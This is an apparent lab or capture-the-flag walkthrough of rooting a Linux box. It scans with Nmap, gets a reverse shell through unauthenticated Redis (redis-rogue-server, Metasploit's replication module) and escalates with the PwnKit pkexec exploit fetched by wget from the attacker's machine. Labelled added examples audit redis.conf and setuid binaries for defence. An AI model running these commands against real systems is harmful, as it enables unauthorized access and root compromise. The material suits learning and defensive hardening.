Initial Reconnaissance
We kick things off with an Nmap scan to gather intel on the target system. This helps us identify which TCP ports are open and what services are running on them. We’re scanning all 65,535 ports to ensure we don’t miss anything.
sudo nmap -Pn -n 192.168.113.176 -sC -sV -p- --open -v
Here’s what each flag means for beginners:
-Pn: Skip host discovery (treat the target as online).
-n: Don’t resolve DNS names.
-sC: Run default scripts (for basic checks).
-sV: Try to detect service versions.
-p-: Scan all 65535 TCP ports.
--open: Show only open ports.
-v: Verbose output.
Nmap Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA)
| 256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA)
|_ 256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519)
6379/tcp open redis Redis key-value store 4.0.14
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Two services are accessible:
- SSH (port 22), which is standard but locked down unless we have valid credentials.
- Redis (port 6379), a database/cache often found in dev environments. This one might be misconfigured.
The SSH service likely won't help us without a valid username/password, so Redis becomes our main target.
Redis is an in-memory key-value store that can be used as a cache, database, or message broker. If it’s not properly secured, we may be able to exploit it.
For more details, check the HackTricks page on Redis exploitation: https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html
Gaining a Foothold via Redis
Let’s try remote code execution using a known Redis technique. We’ll use a tool called redis-rogue-server, which tricks Redis into loading a malicious module that gives us a shell.
Clone the exploit:
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-server
Start a listener on Kali (port 445):
sudo rlwrap nc -nvlp 445
Run the exploit to trigger a reverse shell:
./redis-rogue-server.py --rhost=192.168.113.176 --rport=6379 --lhost=192.168.45.200 --lport=445
We get a reverse shell but it drops as soon as we enter a command. That’s not ideal.
Try the Metasploit alternative: the exploit/linux/redis/redis_replication_cmd_exec module.
sudo msfconsole -q
use exploit/linux/redis/redis_replication_cmd_exec
set RHOSTS 192.168.113.176
set SRVHOST 192.168.45.200
set LHOST 192.168.45.200
run
This method successfully gives us a Meterpreter session.
Get an interactive shell by running:
shell
We’re logged in as the user prudence.
Upgrade to a more stable bash shell by running:
which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
User Flag
The user flag is located in prudence’s home directory.
cat local.txt
Privilege Escalation
Check for sudo permissions by running:
sudo -l
This shows that the user prudence can run /usr/local/bin/redis-status as root without a password. However, this binary doesn’t seem directly exploitable (no command injection or writable paths). GTFOBins confirms Redis isn't helpful here either: https://gtfobins.github.io/gtfobins/redis/
We take a look at the notes in prudence’s home directory:
cat notes.txt
The notes mention Redis protected mode, which only accepts connections from 127.0.0.1. That means Redis can only be reached from the local machine unless that setting is disabled.
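The foothold above works because the Redis instance accepts unauthenticated connections from the network and still exposes the replication and module-loading commands that redis-rogue-server and the Metasploit replication module rely on; the protected-mode note in prudence’s home directory is the setting that would normally have stopped it. As an added example (not part of the original walkthrough), here is a small redis.conf audit that flags exactly those settings: bind address, protected-mode, requirepass, and whether MODULE, SLAVEOF, REPLICAOF, CONFIG and DEBUG have been renamed or disabled with rename-command. Both sample configs are constructed for the example; the secret and the renamed command name are placeholders.

```python
"""Audit a redis.conf for the settings that enable the rogue-master / MODULE LOAD
technique. Added example, not code from the walkthrough or from Redis itself."""
from typing import Dict, List, Set, Tuple

# Commands the replication-based RCE path relies on; Redis 4.x lets an admin
# disable or rename them with rename-command (ACLs do the same on newer versions).
DANGEROUS_COMMANDS = {"MODULE", "SLAVEOF", "REPLICAOF", "CONFIG", "DEBUG"}


def parse_redis_conf(text: str) -> Tuple[Dict[str, List[List[str]]], Set[str]]:
    """Return (directives, protected_commands).

    directives maps a lowercase directive name to the argument list of each
    occurrence (rename-command legitimately appears many times).
    protected_commands holds commands that were disabled ("") or renamed.
    """
    directives: Dict[str, List[List[str]]] = {}
    protected: Set[str] = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        name, args = parts[0].lower(), parts[1:]
        directives.setdefault(name, []).append(args)
        if name == "rename-command" and len(args) == 2:
            original, target = args[0].upper(), args[1].strip("\"'")
            if target == "" or target.upper() != original:
                protected.add(original)
    return directives, protected


def audit_redis_conf(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    directives, protected = parse_redis_conf(text)
    findings: List[str] = []

    # With no 'bind' directive Redis listens on every interface.
    binds = [addr for args in directives.get("bind", []) for addr in args]
    if not binds or any(addr in ("0.0.0.0", "::", "*") for addr in binds):
        findings.append("listens on all interfaces (no restrictive 'bind')")

    # protected-mode defaults to yes; only an explicit 'no' is a problem.
    mode = directives.get("protected-mode", [["yes"]])[-1]
    if mode and mode[0].lower() == "no":
        findings.append("protected-mode disabled")

    if not directives.get("requirepass"):
        findings.append("no requirepass: unauthenticated clients get full access")

    for cmd in sorted(DANGEROUS_COMMANDS - protected):
        findings.append(f"{cmd} is reachable (not renamed or disabled)")
    return findings


# Constructed sample: the kind of dev-box config that makes the attack above work.
WEAK_CONF = """
# constructed sample config
port 6379
bind 0.0.0.0
protected-mode no
"""

# Constructed sample: the same server hardened (placeholder values, replace them).
HARDENED_CONF = """
port 6379
bind 127.0.0.1 ::1
protected-mode yes
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command DEBUG ""
rename-command CONFIG "cfg-REPLACE-WITH-RANDOM-SUFFIX"
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        found = audit_redis_conf(conf)
        print(f"[{label}] {len(found)} finding(s)")
        for item in found:
            print("  -", item)
```

Run it against a real redis.conf by reading the file into audit_redis_conf; the weak sample produces eight findings and the hardened one none. Renaming CONFIG instead of disabling it keeps it usable for administrators while denying it to anyone who only knows the stock command name.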
No clear privilege escalation path here, so let’s try a more automated approach.
LinPEAS - PrivEsc Enumeration
Use LinPEAS to look for misconfigurations, outdated software, or known vulnerabilities.
Serve LinPEAS from Kali:
python3 -m http.server 80
On target, download LinPEAS and change it to executable mode:
wget http://192.168.45.200/linpeas.sh -O linpeas.sh
chmod +x linpeas.sh
Run LinPEAS:
./linpeas.sh
LinPEAS suggests several Linux exploits, then freezes at this point.
We will background the current shell and open another shell session using Meterpreter.
Exploiting with PwnKit
We’ll try exploiting a local privilege escalation bug using PwnKit, a well-known exploit for the pkexec vulnerability.
On Kali:
git clone https://github.com/ly4k/PwnKit
Copy PwnKit.sh to the directory your HTTP server is serving, download it on the target, and make it executable:
wget http://192.168.45.200/PwnKit.sh -O PwnKit.sh
chmod +x PwnKit.sh
Run the exploit on target:
./PwnKit.sh
Boom - we are now root!
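PwnKit only works because pkexec is a setuid-root binary; patching it, or stripping the bit with chmod 0755 /usr/bin/pkexec, removes that precondition. As an added example (not part of the original walkthrough or of PwnKit), here is a POSIX shell setuid inventory that a defender can run to spot pkexec and any other setuid binary missing from a baseline. The baseline file path and the script name suid_audit.sh are assumptions for the example.

```shell
#!/bin/sh
# Setuid-root inventory and baseline diff. Added example, not from the walkthrough.
# Usage: suid_audit.sh [ROOT_DIR] [BASELINE_FILE]
#   ROOT_DIR defaults to /; BASELINE_FILE is a list of expected setuid paths,
#   one per line (/etc/suid-baseline.txt is an assumed location, not a standard one).

# Exit 0 if the path is a setuid file, 1 otherwise (the precondition PwnKit needs).
is_suid() {
    [ -u "$1" ]
}

# All setuid files under DIR, optionally restricted to OWNER, sorted one per line.
# Usage: list_suid DIR [OWNER]
list_suid() {
    if [ -n "${2:-}" ]; then
        find "$1" -xdev -type f -perm -4000 -user "$2" 2>/dev/null | sort
    else
        find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
    fi
}

# Print setuid files under DIR that are not listed in BASELINE_FILE.
# Usage: unexpected_suid DIR BASELINE_FILE [OWNER]
# Exit status follows grep: 0 when something unexpected was printed, 1 when clean.
unexpected_suid() {
    list_suid "$1" "${3:-}" | grep -v -x -F -f "$2"
}

# Only run the full audit when invoked as the script itself, so the functions
# can also be sourced from another script.
if [ "${0##*/}" = "suid_audit.sh" ]; then
    root_dir=${1:-/}
    baseline=${2:-/etc/suid-baseline.txt}
    pkexec_path="$root_dir/usr/bin/pkexec"
    if is_suid "$pkexec_path"; then
        echo "WARNING: $pkexec_path is setuid; patch it or run: chmod 0755 $pkexec_path"
    fi
    if [ -r "$baseline" ]; then
        echo "setuid-root binaries not in $baseline:"
        unexpected_suid "$root_dir" "$baseline" root || echo "(none)"
    else
        echo "no baseline at $baseline; current setuid-root inventory:"
        list_suid "$root_dir" root
    fi
fi
```

Generate the baseline once on a freshly patched host with list_suid / root and store it read-only; afterwards any new line from unexpected_suid is either a package change you expected or something worth investigating.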
Root Flag
The root flag proof.txt can be obtained from the root directory:
cat /root/proof.txt